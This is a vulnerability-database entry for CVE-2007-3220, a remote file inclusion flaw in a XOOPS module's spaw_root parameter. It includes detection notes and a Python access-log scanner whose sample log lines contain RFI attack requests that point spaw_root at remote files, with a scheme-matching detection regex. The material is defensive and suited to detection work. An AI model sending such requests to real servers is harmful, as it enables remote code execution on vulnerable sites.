CVE-2007-3220
published 2007-06-14

Priority: P3 (49)
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Tags: EXPLOIT
EPSS: 62.75% (99.1th percentile)
PHP remote file inclusion vulnerability in admin/editor2/spaw_control.class.php in the Cjay Content 3 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this may be a duplicate of CVE-2006-4656.

Affected (1 range)

Vendor: xoops
Product: cjay_content_module
Version range: not listed
Fixed in: not listed

Detection & IOCs (extracted from sources)

Path: /modules/cjaycontent/admin/editor2/spaw_control.class.php
Path: admin/editor2/spaw_control.class.php
  • Detect HTTP requests targeting spaw_control.class.php with a URL-valued spaw_root parameter; this indicates a remote file inclusion attempt.
  • The trailing '?' appended to the injected URL is a classic RFI technique that turns the remainder of the include path into a query string; look for spaw_root values ending in '?'.
  • Exploitation is only possible when PHP register_globals is ON and magic_quotes is OFF. Flag that server configuration as high-risk where this module is present, and account for the prerequisite when tuning detections.
  • This CVE may be a duplicate of CVE-2006-4656; correlate findings with that CVE to avoid double-counting incidents.
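A defender-side check for the first two bullets above, added here as an example (it is not from the CVE record or the XOOPS module): it scans Apache-style access-log lines for requests to spaw_control.class.php whose spaw_root value carries a URL scheme, and separately notes the trailing '?' pattern. The log lines, client addresses and file names are constructed sample data; the regexes and finding labels are this example's own.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Apache combined format, not real traffic).
SAMPLE_LOG = """\
203.0.113.5 - - [14/Jun/2007:10:01:02 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://198.51.100.7/file.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [14/Jun/2007:10:02:03 +0000] "GET /modules/cjaycontent/index.php?id=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [14/Jun/2007:10:03:04 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=%68ttp%3a%2f%2f198.51.100.8%2fx.txt HTTP/1.1" 200 512 "-" "curl/7.15"
203.0.113.8 - - [14/Jun/2007:10:04:05 +0000] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=/var/www/html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# Request line inside a combined-format log entry: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Any URL scheme prefix (http://, https://, ftp://, ...), case-insensitive.
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)


def inspect_request(target):
    """Return finding labels for one request target (path plus query string)."""
    findings = []
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/spaw_control.class.php"):
        return findings
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX once
    for raw in params.get("spaw_root", []):
        value = unquote(raw).strip()  # second decode catches double-encoded schemes
        if SCHEME_RE.match(value):
            findings.append("rfi_url_in_spaw_root")
            if value.endswith("?"):
                findings.append("trailing_question_mark")
    return findings


def scan_log(text):
    """Return (client_ip, target, findings) for every log line that triggers a finding."""
    hits = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = inspect_request(match.group("target"))
        if findings:
            hits.append((line.split(" ", 1)[0], match.group("target"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, ",".join(findings), target)
```

A local path in spaw_root (the last sample line) is deliberately not flagged, since the CVE concerns inclusion from a URL; extend SCHEME_RE if other wrappers matter in your environment.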